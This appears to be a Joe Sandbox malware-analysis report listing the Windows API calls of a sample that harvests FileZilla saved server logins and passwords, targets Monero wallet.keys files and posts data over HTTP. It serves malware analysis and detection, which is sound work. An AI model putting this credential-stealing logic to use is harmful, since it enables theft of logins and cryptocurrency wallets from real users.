GetProcAddress.KERNEL32(74DD0000,0114D050), ref: 00379FB1
GetProcAddress.KERNEL32(74DD0000,01135A50), ref: 00379FCA
GetProcAddress.KERNEL32(74DD0000,0114CEE8), ref: 00379FE2
GetProcAddress.KERNEL32(74DD0000,0114CF18), ref: 00379FFA
GetProcAddress.KERNEL32(74DD0000,01135710), ref: 0037A013
GetProcAddress.KERNEL32(74DD0000,01135CF0), ref: 0037A02B
LoadLibraryA.KERNEL32(0114D008,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A03D
LoadLibraryA.KERNEL32(0114D0E0,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A04E
LoadLibraryA.KERNEL32(0114CF48,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A060
LoadLibraryA.KERNEL32(0114CE28,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A072
LoadLibraryA.KERNEL32(0114CE88,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A083
LoadLibraryA.KERNEL32(0114CF00,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A095
LoadLibraryA.KERNEL32(0114CF30,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A0A7
LoadLibraryA.KERNEL32(0114CF60,?,00375CA3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE3), ref: 0037A0B8
GetProcAddress.KERNEL32(75290000,01135D10), ref: 0037A0DA
GetProcAddress.KERNEL32(75290000,0114D290), ref: 0037A0F2
GetProcAddress.KERNEL32(75290000,01148F48), ref: 0037A10A
GetProcAddress.KERNEL32(75290000,0114D158), ref: 0037A123
GetProcAddress.KERNEL32(75290000,01135DD0), ref: 0037A13B
GetProcAddress.KERNEL32(73B70000,0113BA18), ref: 0037A160
GetProcAddress.KERNEL32(73B70000,01135B90), ref: 0037A179
GetProcAddress.KERNEL32(73B70000,0113B8B0), ref: 0037A191
GetProcAddress.KERNEL32(73B70000,0114D3C8), ref: 0037A1A9
GetProcAddress.KERNEL32(73B70000,0114D3E0), ref: 0037A1C2
GetProcAddress.KERNEL32(73B70000,01135E50), ref: 0037A1DA
GetProcAddress.KERNEL32(73B70000,01135D30), ref: 0037A1F2
GetProcAddress.KERNEL32(73B70000,0114D368), ref: 0037A20B
GetProcAddress.KERNEL32(752C0000,01135B70), ref: 0037A22C
GetProcAddress.KERNEL32(752C0000,01135AB0), ref: 0037A244
GetProcAddress.KERNEL32(752C0000,0114D398), ref: 0037A25D
GetProcAddress.KERNEL32(752C0000,0114D2D8), ref: 0037A275
GetProcAddress.KERNEL32(752C0000,01135BB0), ref: 0037A28D
GetProcAddress.KERNEL32(74EC0000,0113B810), ref: 0037A2B3
GetProcAddress.KERNEL32(74EC0000,0113B7C0), ref: 0037A2CB
GetProcAddress.KERNEL32(74EC0000,0114D380), ref: 0037A2E3
GetProcAddress.KERNEL32(74EC0000,01135B30), ref: 0037A2FC
GetProcAddress.KERNEL32(74EC0000,01135C30), ref: 0037A314
GetProcAddress.KERNEL32(74EC0000,0113B8D8), ref: 0037A32C
GetProcAddress.KERNEL32(75BD0000,0114D1E8), ref: 0037A352
GetProcAddress.KERNEL32(75BD0000,01135AD0), ref: 0037A36A
GetProcAddress.KERNEL32(75BD0000,01148FD8), ref: 0037A382
GetProcAddress.KERNEL32(75BD0000,0114D2C0), ref: 0037A39B
GetProcAddress.KERNEL32(75BD0000,0114D200), ref: 0037A3B3
GetProcAddress.KERNEL32(75BD0000,01135D50), ref: 0037A3CB
GetProcAddress.KERNEL32(75BD0000,01135B50), ref: 0037A3E4
GetProcAddress.KERNEL32(75BD0000,0114D170), ref: 0037A3FC
GetProcAddress.KERNEL32(75BD0000,0114D110), ref: 0037A414
GetProcAddress.KERNEL32(75A70000,01135D90), ref: 0037A436
GetProcAddress.KERNEL32(75A70000,0114D278), ref: 0037A44E
GetProcAddress.KERNEL32(75A70000,0114D2A8), ref: 0037A466
GetProcAddress.KERNEL32(75A70000,0114D188), ref: 0037A47F
GetProcAddress.KERNEL32(75A70000,0114D1A0), ref: 0037A497
GetProcAddress.KERNEL32(75450000,01135C10), ref: 0037A4B8
GetProcAddress.KERNEL32(75450000,01135CB0), ref: 0037A4D1
GetProcAddress.KERNEL32(75DA0000,01135C70), ref: 0037A4F2
GetProcAddress.KERNEL32(75DA0000,0114D320), ref: 0037A50A
GetProcAddress.KERNEL32(6F070000,01135BD0), ref: 0037A530
GetProcAddress.KERNEL32(6F070000,01135E10), ref: 0037A548
GetProcAddress.KERNEL32(6F070000,01135CD0), ref: 0037A560
GetProcAddress.KERNEL32(6F070000,0114D350), ref: 0037A579
GetProcAddress.KERNEL32(6F070000,01135BF0), ref: 0037A591
GetProcAddress.KERNEL32(6F070000,01135DB0), ref: 0037A5A9
GetProcAddress.KERNEL32(6F070000,01135E30), ref: 0037A5C2
GetProcAddress.KERNEL32(6F070000,01135C50), ref: 0037A5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0037A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0037A607
GetProcAddress.KERNEL32(75AF0000,0114D2F0), ref: 0037A629
GetProcAddress.KERNEL32(75AF0000,01148F78), ref: 0037A641
GetProcAddress.KERNEL32(75AF0000,0114D1B8), ref: 0037A659
GetProcAddress.KERNEL32(75AF0000,0114D308), ref: 0037A672
GetProcAddress.KERNEL32(75D90000,01135AF0), ref: 0037A693
GetProcAddress.KERNEL32(6CFD0000,0114D230), ref: 0037A6B4
GetProcAddress.KERNEL32(6CFD0000,01135DF0), ref: 0037A6CD
GetProcAddress.KERNEL32(6CFD0000,0114D338), ref: 0037A6E5
GetProcAddress.KERNEL32(6CFD0000,0114D3B0), ref: 0037A6FD

Strings

HttpQueryInfoA, xrefs: 0037A5FC
InternetSetOptionA, xrefs: 0037A5E5

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 2f2d1689d60f5ab049ef8524fda794ecd1e48b3da8eacebdae08a7bea0c697a5
Instruction ID: d363e7b1a03498b6c0f4861c8e7d2daa9b139193f09a3d1d0cb082dc7177b94d
Opcode Fuzzy Hash: 2f2d1689d60f5ab049ef8524fda794ecd1e48b3da8eacebdae08a7bea0c697a5
Instruction Fuzzy Hash: 906270B5500211AFC799DFA8FD889663BF9F7AE301704851AE609C3235D739944AFF22

Function 00367710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00367724
RtlAllocateHeap.NTDLL(00000000), ref: 0036772B
lstrcat.KERNEL32(?,01149DF8), ref: 003678DB
lstrcat.KERNEL32(?,?), ref: 003678EF
lstrcat.KERNEL32(?,?), ref: 00367903
lstrcat.KERNEL32(?,?), ref: 00367917
lstrcat.KERNEL32(?,0114E450), ref: 0036792B
lstrcat.KERNEL32(?,0114E558), ref: 0036793F
lstrcat.KERNEL32(?,0114E4F8), ref: 00367952
lstrcat.KERNEL32(?,0114E570), ref: 00367966
lstrcat.KERNEL32(?,0114E5E0), ref: 0036797A
lstrcat.KERNEL32(?,?), ref: 0036798E
lstrcat.KERNEL32(?,?), ref: 003679A2
lstrcat.KERNEL32(?,?), ref: 003679B6
lstrcat.KERNEL32(?,0114E450), ref: 003679C9
lstrcat.KERNEL32(?,0114E558), ref: 003679DD
lstrcat.KERNEL32(?,0114E4F8), ref: 003679F1
lstrcat.KERNEL32(?,0114E570), ref: 00367A04
lstrcat.KERNEL32(?,0114E648), ref: 00367A18
lstrcat.KERNEL32(?,?), ref: 00367A2C
lstrcat.KERNEL32(?,?), ref: 00367A40
lstrcat.KERNEL32(?,?), ref: 00367A54
lstrcat.KERNEL32(?,0114E450), ref: 00367A68
lstrcat.KERNEL32(?,0114E558), ref: 00367A7B
lstrcat.KERNEL32(?,0114E4F8), ref: 00367A8F
lstrcat.KERNEL32(?,0114E570), ref: 00367AA3
lstrcat.KERNEL32(?,0114E6B0), ref: 00367AB6
lstrcat.KERNEL32(?,?), ref: 00367ACA
lstrcat.KERNEL32(?,?), ref: 00367ADE
lstrcat.KERNEL32(?,?), ref: 00367AF2
lstrcat.KERNEL32(?,0114E450), ref: 00367B06
lstrcat.KERNEL32(?,0114E558), ref: 00367B1A
lstrcat.KERNEL32(?,0114E4F8), ref: 00367B2D
lstrcat.KERNEL32(?,0114E570), ref: 00367B41
lstrcat.KERNEL32(?,0114E718), ref: 00367B55
lstrcat.KERNEL32(?,?), ref: 00367B69
lstrcat.KERNEL32(?,?), ref: 00367B7D
lstrcat.KERNEL32(?,?), ref: 00367B91
lstrcat.KERNEL32(?,0114E450), ref: 00367BA4
lstrcat.KERNEL32(?,0114E558), ref: 00367BB8
lstrcat.KERNEL32(?,0114E4F8), ref: 00367BCC
lstrcat.KERNEL32(?,0114E570), ref: 00367BDF
lstrcat.KERNEL32(?,0114E780), ref: 00367BF3
lstrcat.KERNEL32(?,?), ref: 00367C07
lstrcat.KERNEL32(?,?), ref: 00367C1B
lstrcat.KERNEL32(?,?), ref: 00367C2F
lstrcat.KERNEL32(?,0114E450), ref: 00367C43
lstrcat.KERNEL32(?,0114E558), ref: 00367C56
lstrcat.KERNEL32(?,0114E4F8), ref: 00367C6A
lstrcat.KERNEL32(?,0114E570), ref: 00367C7E

Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020,003817FC), ref: 00367606
Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020,00000000), ref: 00367648
Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020, : ), ref: 0036765A
Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020,00000000), ref: 0036768F
Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020,00381804), ref: 003676A0
Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020,00000000), ref: 003676D3
Part of subcall function 003675D0: lstrcat.KERNEL32(2F476020,00381808), ref: 003676ED
Part of subcall function 003675D0: task.LIBCPMTD ref: 003676FB

lstrcat.KERNEL32(?,0114EA78), ref: 00367E0B
lstrcat.KERNEL32(?,0114D620), ref: 00367E1E
lstrlen.KERNEL32(2F476020), ref: 00367E2B
lstrlen.KERNEL32(2F476020), ref: 00367E3B

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 359ba96666c4fad02a51e85f76dd0d09598cc7434ae205f96aa30d74f14e9073
Instruction ID: 1a428fc27cdd033f962e4f69727606f7df51f1885d848ccca6f1c225317fdb2e
Opcode Fuzzy Hash: 359ba96666c4fad02a51e85f76dd0d09598cc7434ae205f96aa30d74f14e9073
Instruction Fuzzy Hash: 80321FB2810314ABCB66EBA0DC85DEA737CBB55700F444A89F31D66090DB78E789DF51

Function 00370250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003699EC
Part of subcall function 003699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00369A11
Part of subcall function 003699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00369A31
Part of subcall function 003699C0: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 00369A5A
Part of subcall function 003699C0: LocalFree.KERNEL32(0036148F), ref: 00369A90
Part of subcall function 003699C0: CloseHandle.KERNEL32(000000FF), ref: 00369A9A

Part of subcall function 00378E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378E52

GetProcessHeap.KERNEL32(00000000,000F423F,00380DBA,00380DB7,00380DB6,00380DB3), ref: 00370362
RtlAllocateHeap.NTDLL(00000000), ref: 00370369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00370385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 00370393
StrStrA.SHLWAPI(00000000,<Port>), ref: 003703CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 003703DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00370419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 00370427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00370463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 00370475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 00370502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 0037051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 00370532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 0037054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00370562
lstrcat.KERNEL32(?,profile: null), ref: 00370571
lstrcat.KERNEL32(?,url: ), ref: 00370580
lstrcat.KERNEL32(?,00000000), ref: 00370593
lstrcat.KERNEL32(?,00381678), ref: 003705A2
lstrcat.KERNEL32(?,00000000), ref: 003705B5
lstrcat.KERNEL32(?,0038167C), ref: 003705C4
lstrcat.KERNEL32(?,login: ), ref: 003705D3
lstrcat.KERNEL32(?,00000000), ref: 003705E6
lstrcat.KERNEL32(?,00381688), ref: 003705F5
lstrcat.KERNEL32(?,password: ), ref: 00370604
lstrcat.KERNEL32(?,00000000), ref: 00370617
lstrcat.KERNEL32(?,00381698), ref: 00370626
lstrcat.KERNEL32(?,0038169C), ref: 00370635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00380DB2), ref: 0037068E

Strings

<Port>, xrefs: 003703C6
<User>, xrefs: 00370410
password: , xrefs: 003705FB
<Host>, xrefs: 0037037C
<Pass encoding="base64">, xrefs: 0037045A
profile: null, xrefs: 00370568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 003702A4
login: , xrefs: 003705CA
url: , xrefs: 00370577
browser: FileZilla, xrefs: 00370559

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 9e2a2f55b77f8a7b73b0dc31bc6c8de968c5b0591857fb3b393fa357fb4db53d
Instruction ID: eac8faf4a5da1ca7642b452a30bebbf116ed0b440012e739c547e1ede4acd3d5
Opcode Fuzzy Hash: 9e2a2f55b77f8a7b73b0dc31bc6c8de968c5b0591857fb3b393fa357fb4db53d
Instruction Fuzzy Hash: 9BD13671900208ABCB16FBF4DD95DEE7778EF54300F448458F506BA095DF78AA0ADB62

Function 00365100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364839
Part of subcall function 003647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364849

lstrlen.KERNEL32(00000000), ref: 00365193

Part of subcall function 00378EA0: CryptBinaryToStringA.CRYPT32(00000000,00365184,40000001,00000000,00000000,?,00365184), ref: 00378EC0

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00365207
StrCmpCA.SHLWAPI(?,0114EBA8), ref: 00365225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00365340
HttpOpenRequestA.WININET(00000000,0114EA68,?,0114DEE0,00000000,00000000,00400100,00000000), ref: 003653A4

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0114EA88,00000000,?,0114A540,00000000,?,003819DC,00000000,?,003751CF), ref: 00365737
lstrlen.KERNEL32(00000000), ref: 0036574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0036575C
RtlAllocateHeap.NTDLL(00000000), ref: 00365763
lstrlen.KERNEL32(00000000), ref: 00365778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003657A9
lstrlen.KERNEL32(00000000), ref: 003657C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003657E1
lstrlen.KERNEL32(00000000,?,?), ref: 0036580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00365822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0036584D
InternetCloseHandle.WININET(00000000), ref: 003658B1
InternetCloseHandle.WININET(00000000), ref: 003658BE
InternetCloseHandle.WININET(00000000), ref: 003658C8

Strings

", xrefs: 003655C4
", xrefs: 00365482
--, xrefs: 00365280
------, xrefs: 0036563B
", xrefs: 00365706
------, xrefs: 003653B7
------, xrefs: 00365297
------, xrefs: 003654F9

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
